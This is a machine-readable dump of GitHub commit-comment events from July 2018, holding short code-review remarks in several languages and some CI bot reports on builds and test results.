{"id":"7965411492","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29708258,"position":25,"line":22,"path":"test/Remittance.js","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-14T07:56:21Z","updated_at":"2018-07-14T07:56:21Z","author_association":"OWNER","body":"My bad. I deleberately put it to skip these test and directly jump to test 3. They were taking lots of time to execute. Removed it in latest change."}},"created_at":"2018-07-14T07:56:21Z"}
{"id":"7965411547","type":"CommitCommentEvent","actor":{"login":"chamanbharti"},"repo":{"name":"chamanbharti/string"},"payload":{"comment":{"id":29708259,"position":10,"line":10,"path":"String/src/com/mutable/StringBuffer1.java","commit_id":"9afaa0e3f364dccea1c7b6678f55d3f487f2880a","created_at":"2018-07-14T07:56:23Z","updated_at":"2018-07-14T07:56:23Z","author_association":"OWNER","body":"good "}},"created_at":"2018-07-14T07:56:23Z"}
{"id":"7965411851","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29708260,"position":null,"line":null,"path":null,"commit_id":"77082fc8c4ad8eab6d98ca91fcaa04d250a0f4dd","created_at":"2018-07-14T07:56:40Z","updated_at":"2018-07-14T07:56:40Z","author_association":"NONE","body":"### Results for event id: 838b0aea-0f1f-4d9d-ad6f-dbe2cd5e3915\n<details><summary>DockerServerless : Deploy to Lambda (4f82fb) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (63 lines total):**\n\n```\n...\n    \"ContentLength\": 60178954, \n    \"ETag\": \"\\\"dd43d38c0a6e94bbc1a3f418295bb50b\\\"\", \n    \"Metadata\": {}\n}\n>>> unpacking deps-187a55dd2655dbd8da6204eb9d1f36ae.tar.gz to /usr/workspace/clone/node_modules\n>>> running custom build commmand..\nyarn install v1.7.0\nverbose 0.348 Checking for configuration file \"/usr/workspace/clone/.npmrc\".\nverbose 0.351 Checking for configuration file \"/usr/local/share/.npmrc\".\nverbose 0.351 Checking for configuration file \"/root/.nvm/versions/node/v8.11.1/etc/npmrc\".\nverbose 0.354 Checking for configuration file \"/root/.npmrc\".\nverbose 0.355 Checking for configuration file \"/usr/workspace/clone/.npmrc\".\nverbose 0.355 Checking for configuration file \"/usr/workspace/.npmrc\".\nverbose 0.355 Checking for configuration file \"/usr/.npmrc\".\nverbose 0.359 Checking for configuration file \"/usr/workspace/clone/.yarnrc\".\nverbose 0.359 Checking for configuration file \"/usr/local/share/.yarnrc\".\nverbose 0.359 Checking for configuration file \"/root/.nvm/versions/node/v8.11.1/etc/yarnrc\".\nverbose 0.36 Checking for configuration file \"/root/.yarnrc\".\nverbose 0.36 Checking for configuration file \"/usr/workspace/clone/.yarnrc\".\nverbose 0.36 Checking for configuration file \"/usr/workspace/.yarnrc\".\nverbose 0.36 Checking for configuration file \"/usr/.yarnrc\".\nverbose 0.362 current time: 2018-07-14T07:56:56.861Z\n[1/4] Resolving packages...\nsuccess Already up-to-date.\nDone in 1.03s.\nDEPS_FOUND=true\nno package deploys directly required\nAT LEAST ONE PACKAGE DEPLOYMENT FAILED\nExecution time was 54 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-14T07:56:40Z"}
{"id":"7965411877","type":"CommitCommentEvent","actor":{"login":"borisyankov"},"repo":{"name":"zulip/zulip-mobile"},"payload":{"comment":{"id":29708261,"position":4,"line":6,"path":"src/__tests__/baseSelectors-test.js","commit_id":"ee11b2f4dee61602ebcce8487c700b3eaf02d86a","created_at":"2018-07-14T07:56:41Z","updated_at":"2018-07-14T07:56:41Z","author_association":"CONTRIBUTOR","body":"I would have agreed to the rename if the selector was returning the `narrow` property directly. Since this is not the case, `ChatScreenParams` looks very concrete and correct."}},"created_at":"2018-07-14T07:56:41Z"}
{"id":"7965412818","type":"CommitCommentEvent","actor":{"login":"MEGApixel23"},"repo":{"name":"sysstas/ccback"},"payload":{"comment":{"id":29708262,"position":90,"line":71,"path":"controllers/cities.controller.js","commit_id":"1df22f63d30e3c9d86d11c938bd18828054ac53c","created_at":"2018-07-14T07:57:35Z","updated_at":"2018-07-14T07:57:35Z","author_association":"NONE","body":"This block can be rewritten as more readable:\r\n\r\n```js\r\nconst city = await City.findById(req.params.id);\r\nconst result = await city.update({ cityName: req.body.cityName });\r\n\r\nreturn res.status(200).send(result);\r\n```\r\nOR in Promise-like style without nested Promise:\r\n\r\n```js\r\nawait City.findById(req.params.id)\r\n  .then(city => city.update({ cityName: req.body.cityName }))\r\n  .then(result => res.status(200).send(result));\r\n```"}},"created_at":"2018-07-14T07:57:35Z"}
{"id":"7965413701","type":"CommitCommentEvent","actor":{"login":"sreevatsanraman"},"repo":{"name":"caskdata/cdap"},"payload":{"comment":{"id":29708263,"position":null,"line":null,"path":null,"commit_id":"4076e704a8028e0d7e0978295beedd27163291e4","created_at":"2018-07-14T07:58:24Z","updated_at":"2018-07-14T07:58:24Z","author_association":"CONTRIBUTOR","body":"Last commit looks good. "}},"created_at":"2018-07-14T07:58:24Z"}
{"id":"7965416959","type":"CommitCommentEvent","actor":{"login":"rjs1197"},"repo":{"name":"rjs1197/training"},"payload":{"comment":{"id":29708277,"position":null,"line":null,"path":null,"commit_id":"f2fdca331762dfa0820430ea2dd3c1bdc7fa1c23","created_at":"2018-07-14T08:01:11Z","updated_at":"2018-07-14T08:01:11Z","author_association":"OWNER","body":"Also, fixed article category in /READEME.md\r\n\r\nThe solution follow :\r\n\r\n> $ cd training\r\n> $ vi README.md\r\n> $ mv react/Readme.txt react/README.md\r\n\r\n'mv' command is function for change file name and moving file.\r\n\r\n'vi' command use open for vi editor."}},"created_at":"2018-07-14T08:01:11Z"}
{"id":"7965419768","type":"CommitCommentEvent","actor":{"login":"mkangia"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":29708280,"position":12,"line":720,"path":"corehq/apps/locations/tests/test_bulk_management.py","commit_id":"8c2d3c168055b30bc73f8f622bbad2ce519be203","created_at":"2018-07-14T08:03:43Z","updated_at":"2018-07-14T08:03:43Z","author_association":"CONTRIBUTOR","body":"Agree that this would increase the test run time but i am counting on a straight clean up to be quicker than running checks/methods to invalidate cache for each/specific item since the cache would be small considering the amount of data each test sets up.\r\nThough clearing cache would help avoid issues like this one that we are resolving here and hence should be worth adding it irrespective of the fact it increases run time?"}},"created_at":"2018-07-14T08:03:43Z"}
{"id":"7965420665","type":"CommitCommentEvent","actor":{"login":"OptimusJc"},"repo":{"name":"OptimusJc/recipes"},"payload":{"comment":{"id":29708282,"position":null,"line":null,"path":null,"commit_id":"71ea917ba5908e06267617c91aaca063c24076e5","created_at":"2018-07-14T08:04:38Z","updated_at":"2018-07-14T08:04:38Z","author_association":"OWNER","body":"Take a look"}},"created_at":"2018-07-14T08:04:38Z"}
{"id":"7965420747","type":"CommitCommentEvent","actor":{"login":"doroginin"},"repo":{"name":"golang/go"},"payload":{"comment":{"id":29708283,"position":12,"line":217,"path":"src/cmd/go/mod_test.go","commit_id":"3239e9d3dc7ab3df904b91ace570cc0e6be7999f","created_at":"2018-07-14T08:04:41Z","updated_at":"2018-07-14T08:04:41Z","author_association":"CONTRIBUTOR","body":"Why do you skip test here? You already deleted all `os.RemoveAll` calls below."}},"created_at":"2018-07-14T08:04:41Z"}
{"id":"7965420932","type":"CommitCommentEvent","actor":{"login":"Aprogiena"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29708284,"position":50,"line":145,"path":"src/Stratis.Bitcoin/Base/ConsensusManagerBehavior.cs","commit_id":"a5f00a8d93f29bd75d290edb226a0309fe3aaec8","created_at":"2018-07-14T08:04:52Z","updated_at":"2018-07-14T08:04:52Z","author_association":"CONTRIBUTOR","body":"Where did this go?"}},"created_at":"2018-07-14T08:04:52Z"}
{"id":"7965424376","type":"CommitCommentEvent","actor":{"login":"shubhanus"},"repo":{"name":"vishalnagda1/react_todo_app"},"payload":{"comment":{"id":29708288,"position":15,"line":15,"path":"src/components/add_todo.js","commit_id":"257ec40707269a9a6b6b04459a09a852fc3e93a8","created_at":"2018-07-14T08:07:58Z","updated_at":"2018-07-14T08:07:58Z","author_association":"COLLABORATOR","body":"user setState callback for this operations you should not call 2 setState together."}},"created_at":"2018-07-14T08:07:58Z"}
{"id":"7965429268","type":"CommitCommentEvent","actor":{"login":"shubhanus"},"repo":{"name":"vishalnagda1/react_todo_app"},"payload":{"comment":{"id":29708303,"position":31,"line":84,"path":"src/components/todo.js","commit_id":"42f46562ed008e9c79b8a99e353c9da77b18ff82","created_at":"2018-07-14T08:12:25Z","updated_at":"2018-07-14T08:12:25Z","author_association":"COLLABORATOR","body":"if you are not doing any operations in arrow function then just return with short syntax no need of return \r\n`previousState => ({\r\n    todo_data: [...previousState.todo_data, data]\r\n }),`"}},"created_at":"2018-07-14T08:12:25Z"}
{"id":"7965430907","type":"CommitCommentEvent","actor":{"login":"shubhanus"},"repo":{"name":"vishalnagda1/react_todo_app"},"payload":{"comment":{"id":29708307,"position":37,"line":90,"path":"src/components/todo.js","commit_id":"42f46562ed008e9c79b8a99e353c9da77b18ff82","created_at":"2018-07-14T08:14:01Z","updated_at":"2018-07-14T08:14:01Z","author_association":"COLLABORATOR","body":"u can just pass `this.updateLocalList` handler\r\n`() => this.updateLocalList();` to `this.updateLocalList` will also work because u are not passing any params in this call."}},"created_at":"2018-07-14T08:14:01Z"}
{"id":"7965431352","type":"CommitCommentEvent","actor":{"login":"hunter0399"},"repo":{"name":"hunter0399/sky4402_TeamSample"},"payload":{"comment":{"id":29708312,"position":null,"line":null,"path":null,"commit_id":"914759bce294765fd5ea4d2276b83b040eece32a","created_at":"2018-07-14T08:14:24Z","updated_at":"2018-07-14T08:14:24Z","author_association":"OWNER","body":"\"3줄\"추가했어요"}},"created_at":"2018-07-14T08:14:24Z"}
{"id":"7965432897","type":"CommitCommentEvent","actor":{"login":"mynameislrj"},"repo":{"name":"mynameislrj/record"},"payload":{"comment":{"id":29708318,"position":null,"line":null,"path":null,"commit_id":"53dccf02637e2e09898d0c56de403e6dffca53ac","created_at":"2018-07-14T08:15:41Z","updated_at":"2018-07-14T08:15:41Z","author_association":"OWNER","body":"ajax请求错误"}},"created_at":"2018-07-14T08:15:41Z"}
{"id":"7965435296","type":"CommitCommentEvent","actor":{"login":"DavidGZ"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29708320,"position":null,"line":null,"path":null,"commit_id":"9edd87ecb4d781dcc5558834a41a4cdb12d618ad","created_at":"2018-07-14T08:17:53Z","updated_at":"2018-07-14T08:17:53Z","author_association":"MEMBER","body":"Oops...thanks for fixing this. Perhaps the \"$\" symbol was parsed as a special character so it didn't change the variable name?"}},"created_at":"2018-07-14T08:17:53Z"}
{"id":"7965435706","type":"CommitCommentEvent","actor":{"login":"minlexx"},"repo":{"name":"minlexx/qtc-paneencode"},"payload":{"comment":{"id":29708321,"position":null,"line":null,"path":null,"commit_id":"67908b1e0ae09a15c983a108a7110b39a2761588","created_at":"2018-07-14T08:18:13Z","updated_at":"2018-07-14T08:18:13Z","author_association":"OWNER","body":"Hi! As I remember it was working in my tests.\r\nOriginal repo says it has a release for Qtc 4.6 - https://github.com/OneMoreGres/qtc-paneencode/releases - does it work too?\r\nI moved to english Windows and English Visual Studio, so I can't test pane encoding any more 😢 "}},"created_at":"2018-07-14T08:18:13Z"}
{"id":"7965436017","type":"CommitCommentEvent","actor":{"login":"andreySm27"},"repo":{"name":"andreySm27/homework"},"payload":{"comment":{"id":29708322,"position":1,"line":1,"path":"hw2/task1.py","commit_id":"25d495679d4a1c9fc50ac576a0173b0f1e5b3158","created_at":"2018-07-14T08:18:31Z","updated_at":"2018-07-14T08:18:31Z","author_association":"OWNER","body":"# This is ### task1**afaf**_adawz_### xsegg\r\n\r\n> a"}},"created_at":"2018-07-14T08:18:31Z"}
{"id":"7965437389","type":"CommitCommentEvent","actor":{"login":"201315060025"},"repo":{"name":"201315060025/-"},"payload":{"comment":{"id":29708324,"position":null,"line":null,"path":null,"commit_id":"35c38e4b1b139fce34e3100aeaa73df98295aad8","created_at":"2018-07-14T08:19:50Z","updated_at":"2018-07-14T08:19:50Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-14T08:19:50Z"}
{"id":"7965438069","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29708328,"position":null,"line":null,"path":null,"commit_id":"aee9b6fb7ef0af9b6e3b668b7a69751314347ddd","created_at":"2018-07-14T08:20:23Z","updated_at":"2018-07-14T08:20:23Z","author_association":"OWNER","body":"I have just run populateOpenCL.pho to update fractal_cl.h and fractal_coloring_cl.hpp\r\n\r\n@mclarekin , please make the same changes in OpenCL code for fractal coloring"}},"created_at":"2018-07-14T08:20:23Z"}
{"id":"7965447095","type":"CommitCommentEvent","actor":{"login":"technoLord"},"repo":{"name":"technoLord/nrpe"},"payload":{"comment":{"id":29708340,"position":null,"line":null,"path":null,"commit_id":"8455c4e9d9c3069dd835be2a79ed92996f53ecaa","created_at":"2018-07-14T08:28:52Z","updated_at":"2018-07-14T08:28:52Z","author_association":"OWNER","body":"pull request #186 made by @niyonx ( Nigel Yong ) "}},"created_at":"2018-07-14T08:28:52Z"}
{"id":"7965447987","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"npacariz/cars"},"payload":{"comment":{"id":29708344,"position":1,"line":1,"path":"resources/views/about.blade.php","commit_id":"9cda5e78cdce0a678220cdd8b9ae41559084bdcf","created_at":"2018-07-14T08:29:46Z","updated_at":"2018-07-14T08:29:46Z","author_association":"NONE","body":"Zbog ispravnosti dokumenta, trebalo bi da ovaj falj bude standardni `html` fajl, tj. da ima `html`, `head`, `body` tagove, i da sve unutar `body` tag-a pripada nekom elementu. Tipa ovaj `About us!` da bude uwrappovan u `div`"}},"created_at":"2018-07-14T08:29:46Z"}
{"id":"7965448888","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"npacariz/cars"},"payload":{"comment":{"id":29708348,"position":8,"line":18,"path":"routes/web.php","commit_id":"fc1f646e2eaf031550ab4f5a517f6df28c1b071f","created_at":"2018-07-14T08:30:33Z","updated_at":"2018-07-14T08:30:33Z","author_association":"NONE","body":"Vodi racuna da ti navodnici budu konzistentni, tj. da ne stavljas negde `\"`, a negde `'`. "}},"created_at":"2018-07-14T08:30:33Z"}
{"id":"7965449201","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29708349,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-14T08:30:48Z","updated_at":"2018-07-14T08:30:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T08:30:48Z"}
{"id":"7965450205","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"npacariz/cars"},"payload":{"comment":{"id":29708351,"position":7,"line":11,"path":"app/Car.php","commit_id":"ee68272ba5ed5ff728401b4e88eb3dad2e96f85d","created_at":"2018-07-14T08:31:38Z","updated_at":"2018-07-14T08:31:38Z","author_association":"NONE","body":"U migraciji ti se polje zove `number_of_doors`. Isto tako bi trebalo da bude ovde. I takodje, razmaci nakon `,` cine kod citljivijim."}},"created_at":"2018-07-14T08:31:38Z"}
{"id":"7965450705","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"npacariz/cars"},"payload":{"comment":{"id":29708352,"position":17,"line":27,"path":"routes/web.php","commit_id":"ee68272ba5ed5ff728401b4e88eb3dad2e96f85d","created_at":"2018-07-14T08:32:02Z","updated_at":"2018-07-14T08:32:02Z","author_association":"NONE","body":"Isto vazi za navodnike"}},"created_at":"2018-07-14T08:32:02Z"}
{"id":"7965451308","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708354,"position":null,"line":null,"path":null,"commit_id":"f49d9383604b3922f43ded65291539b2cd40fc8e","created_at":"2018-07-14T08:32:33Z","updated_at":"2018-07-14T08:32:33Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2752 of 2941 tests passed, 88 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 221 tests had: EIO diffs.\n * 76 tests had: ESO big diffs.\n * 174 tests had: Table big diffs.\n * 166 tests had: ESO small diffs.\n * 101 tests had: MTR small diffs.\n * 35 tests had: MTR big diffs.\n * 39 tests had: Table small diffs.\n * 19 tests had: ERR diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\nregression Test Summary\n * Passed: 436\n * Failed: 188\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f49d9383604b3922f43ded65291539b2cd40fc8e-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f49d9383604b3922f43ded65291539b2cd40fc8e-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.57%25-yellow.png)</a> \n"}},"created_at":"2018-07-14T08:32:33Z"}
{"id":"7965451333","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"npacariz/cars"},"payload":{"comment":{"id":29708355,"position":5,"line":13,"path":"resources/views/cars.blade.php","commit_id":"d091f044dc5424af8f63387cd0835d9efc81d108","created_at":"2018-07-14T08:32:35Z","updated_at":"2018-07-14T08:32:35Z","author_association":"NONE","body":"Cini mi se da se indentacija malo poremetila ovde. Gledaj da vodis racuna o tome, opet radi citljivosti i urednosti"}},"created_at":"2018-07-14T08:32:35Z"}
{"id":"7965451430","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"npacariz/cars"},"payload":{"comment":{"id":29708356,"position":10,"line":10,"path":"resources/views/show.blade.php","commit_id":"d091f044dc5424af8f63387cd0835d9efc81d108","created_at":"2018-07-14T08:32:41Z","updated_at":"2018-07-14T08:32:41Z","author_association":"NONE","body":"Indentacija :)"}},"created_at":"2018-07-14T08:32:41Z"}
{"id":"7965452338","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29708358,"position":null,"line":null,"path":null,"commit_id":"9edd87ecb4d781dcc5558834a41a4cdb12d618ad","created_at":"2018-07-14T08:33:32Z","updated_at":"2018-07-14T08:33:32Z","author_association":"CONTRIBUTOR","body":"https://travis-ci.org/freemint/freemint/jobs/364706963#L1440\r\n\r\nYes, apparently. Maybe because of a different version of make used there.\r\n"}},"created_at":"2018-07-14T08:33:32Z"}
{"id":"7965452391","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"npacariz/cars"},"payload":{"comment":{"id":29708359,"position":7,"line":5,"path":"resources/views/about.blade.php","commit_id":"6c57aa26ded8e29e33ab2741db8a08043e5a2050","created_at":"2018-07-14T08:33:36Z","updated_at":"2018-07-14T08:33:36Z","author_association":"NONE","body":"Sad ono sto sam napisala u prvom commit-u nema ni veze, s' obzirom da imas `master` fajl u kome imas osnovnu strukturu html-a. Samo ovaj tekst treba uwrappovati u `div` ili `p`"}},"created_at":"2018-07-14T08:33:36Z"}
{"id":"7965453398","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"npacariz/cars"},"payload":{"comment":{"id":29708360,"position":14,"line":14,"path":"resources/views/layouts/master.blade.php","commit_id":"6c57aa26ded8e29e33ab2741db8a08043e5a2050","created_at":"2018-07-14T08:34:30Z","updated_at":"2018-07-14T08:34:30Z","author_association":"NONE","body":"Ovo je sad vise kozmeticki, ovi linkovi u navbaru bi trebalo da pocinju velikim slovom. Glupost, ali cisto da bude lepo"}},"created_at":"2018-07-14T08:34:30Z"}
{"id":"7965453716","type":"CommitCommentEvent","actor":{"login":"PeterAkakpo"},"repo":{"name":"CasparCG/server"},"payload":{"comment":{"id":29708361,"position":null,"line":null,"path":null,"commit_id":"1499d11d90ac8ad3a437bc2ae1746f84e6e33bc9","created_at":"2018-07-14T08:34:44Z","updated_at":"2018-07-14T08:34:44Z","author_association":"NONE","body":"I think when a new feature is introduced,  a short documentation on how to use it will do.  The issues that called for the feature do not provide cue to how to use the feature. "}},"created_at":"2018-07-14T08:34:44Z"}
{"id":"7965453819","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"npacariz/cars"},"payload":{"comment":{"id":29708362,"position":13,"line":13,"path":"resources/views/layouts/master.blade.php","commit_id":"6c57aa26ded8e29e33ab2741db8a08043e5a2050","created_at":"2018-07-14T08:34:49Z","updated_at":"2018-07-14T08:34:49Z","author_association":"NONE","body":"Imas ovde dodatni space izmedju `a` i `href`. Nista posebno, urednosti radi."}},"created_at":"2018-07-14T08:34:49Z"}
{"id":"7965454502","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"npacariz/cars"},"payload":{"comment":{"id":29708364,"position":13,"line":4,"path":"resources/views/show.blade.php","commit_id":"6c57aa26ded8e29e33ab2741db8a08043e5a2050","created_at":"2018-07-14T08:35:26Z","updated_at":"2018-07-14T08:35:26Z","author_association":"NONE","body":"Sav content mora biti unutar nekog taga. `<div>` npr"}},"created_at":"2018-07-14T08:35:26Z"}
{"id":"7965454679","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"npacariz/cars"},"payload":{"comment":{"id":29708365,"position":18,"line":19,"path":"resources/views/layouts/master.blade.php","commit_id":"9cb72f772dbc5411c7e028d2127151fd66974032","created_at":"2018-07-14T08:35:36Z","updated_at":"2018-07-14T08:35:36Z","author_association":"NONE","body":"Indentacija"}},"created_at":"2018-07-14T08:35:36Z"}
{"id":"7965455333","type":"CommitCommentEvent","actor":{"login":"chizhi204"},"repo":{"name":"chizhi204/Dian-task-1"},"payload":{"comment":{"id":29708367,"position":null,"line":null,"path":null,"commit_id":"c858ddadf58fdcd4476bc435b32c54a04c4be46c","created_at":"2018-07-14T08:36:13Z","updated_at":"2018-07-14T08:36:13Z","author_association":"OWNER","body":"Task self compression no note edition."}},"created_at":"2018-07-14T08:36:13Z"}
{"id":"7965455377","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"npacariz/cars"},"payload":{"comment":{"id":29708368,"position":19,"line":20,"path":"resources/views/layouts/master.blade.php","commit_id":"9cb72f772dbc5411c7e028d2127151fd66974032","created_at":"2018-07-14T08:36:15Z","updated_at":"2018-07-14T08:36:15Z","author_association":"NONE","body":"Ne mogu bas da skontam sto je ovo `form` element unutar navbar-a. Nema nikakav input, samo su linkovi."}},"created_at":"2018-07-14T08:36:15Z"}
{"id":"7965458353","type":"CommitCommentEvent","actor":{"login":"helloellis"},"repo":{"name":"helloellis/-token-profile-node"},"payload":{"comment":{"id":29708373,"position":null,"line":null,"path":null,"commit_id":"c543db38fb83af129cba74cacf4a279a43708f01","created_at":"2018-07-14T08:38:56Z","updated_at":"2018-07-14T08:38:56Z","author_association":"OWNER","body":"删除"}},"created_at":"2018-07-14T08:38:56Z"}
{"id":"7965458813","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18012/programming-term2"},"payload":{"comment":{"id":29708377,"position":null,"line":null,"path":null,"commit_id":"9209e3b63a8a77236d956507e08c4bb279c2cc41","created_at":"2018-07-14T08:39:22Z","updated_at":"2018-07-14T08:39:22Z","author_association":"NONE","body":"納期は13:49でした。コミット自体が13:58なのでその時点で間に合っていないため、\r\n7/11の課題は評価しないものとします。\r\n社会に出ると納期遅れは始末書による報告、最悪は違約金が発生するケースもあります。\r\n評価が必要であればメールにて事由を報告してください。正当な事由と判断出来れば減点の上で評価します。\r\n\r\nまた、最初に伝えた通り、「ほうれんそう」は事前にしてください。"}},"created_at":"2018-07-14T08:39:22Z"}
{"id":"7965464769","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708386,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-14T08:44:48Z","updated_at":"2018-07-14T08:44:48Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2317 of 2317 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T08:44:48Z"}
{"id":"7965467196","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29708395,"position":null,"line":null,"path":null,"commit_id":"be50aeb3c3cd56a04d7ed7e3d0fcb2a1ca0e4861","created_at":"2018-07-14T08:46:59Z","updated_at":"2018-07-14T08:46:59Z","author_association":"NONE","body":"あらら、formatの使い方をちょっと間違ってるようです。メッセージを埋め込む箇所がないですね。\r\nformatの使い方をおさらいしておくと、以下の感じです。\r\n\r\n\"CPUが{0}を出しました。あなたの負けです。\".format(\"グー\")\r\n\r\n{0}の部分がグーに置きかわります。formatの前の部分は文字列です。勿論変数でもOKです。"}},"created_at":"2018-07-14T08:46:59Z"}
{"id":"7965467901","type":"CommitCommentEvent","actor":{"login":"mmbhatk"},"repo":{"name":"mmbhatk/sample"},"payload":{"comment":{"id":29708397,"position":null,"line":null,"path":null,"commit_id":"05803506f0393e71ac4741d1cd8b6d1cc01412fc","created_at":"2018-07-14T08:47:41Z","updated_at":"2018-07-14T08:47:41Z","author_association":"OWNER","body":"You figure it out. :)"}},"created_at":"2018-07-14T08:47:41Z"}
{"id":"7965468037","type":"CommitCommentEvent","actor":{"login":"Julusian"},"repo":{"name":"CasparCG/server"},"payload":{"comment":{"id":29708398,"position":null,"line":null,"path":null,"commit_id":"1499d11d90ac8ad3a437bc2ae1746f84e6e33bc9","created_at":"2018-07-14T08:47:48Z","updated_at":"2018-07-14T08:47:48Z","author_association":"COLLABORATOR","body":"@PeterAkakpo This change should have no impact on end users, so there isnt anything that felt worth documenting. It changes some of the inner workings of the screen consumer to allow for extending it more easily."}},"created_at":"2018-07-14T08:47:48Z"}
{"id":"7965471060","type":"CommitCommentEvent","actor":{"login":"erikd"},"repo":{"name":"alanasp/ghc-gsoc"},"payload":{"comment":{"id":29708404,"position":31,"line":408,"path":"compiler/rename/RnNames.hs","commit_id":"68925a419063856b8524ea94e0c8b43469c3818c","created_at":"2018-07-14T08:50:28Z","updated_at":"2018-07-14T08:50:28Z","author_association":"CONTRIBUTOR","body":"I don't think that is going to compile :)."}},"created_at":"2018-07-14T08:50:28Z"}
{"id":"7965471260","type":"CommitCommentEvent","actor":{"login":"satuma777"},"repo":{"name":"sigevo-summer-school-2018/tiger-mosquito-algorithm"},"payload":{"comment":{"id":29708405,"position":null,"line":null,"path":null,"commit_id":"92c2dc834efdc29f6d0b088d551ac6f5977c32ab","created_at":"2018-07-14T08:50:39Z","updated_at":"2018-07-14T08:50:39Z","author_association":"COLLABORATOR","body":"`tigerMosquitoSelection` function is implemented based on [`deap.selection.selTournament`](https://github.com/DEAP/deap/blob/master/deap/tools/selection.py#L51)"}},"created_at":"2018-07-14T08:50:39Z"}
{"id":"7965472764","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29708407,"position":8,"line":8,"path":"clockcss.css","commit_id":"ffee8668ea3d288356d6713a5005c198df45a60b","created_at":"2018-07-14T08:51:56Z","updated_at":"2018-07-14T08:51:56Z","author_association":"COLLABORATOR","body":"Чтобы было единообразие кода лучше задавать значения цветов в полном hex-выражении, т.е.\r\nbackground-color: #d3d3d3 // lightgrey"}},"created_at":"2018-07-14T08:51:56Z"}
{"id":"7965473714","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29708408,"position":15,"line":15,"path":"clockcss.css","commit_id":"ffee8668ea3d288356d6713a5005c198df45a60b","created_at":"2018-07-14T08:52:46Z","updated_at":"2018-07-14T08:52:46Z","author_association":"COLLABORATOR","body":"Лучше использовать сокращенную запись:\r\npadding: 40px 0 0;\r\nили если снизу также нужен отступ в 40px, то:\r\npadding: 40px 0;\r\n"}},"created_at":"2018-07-14T08:52:46Z"}
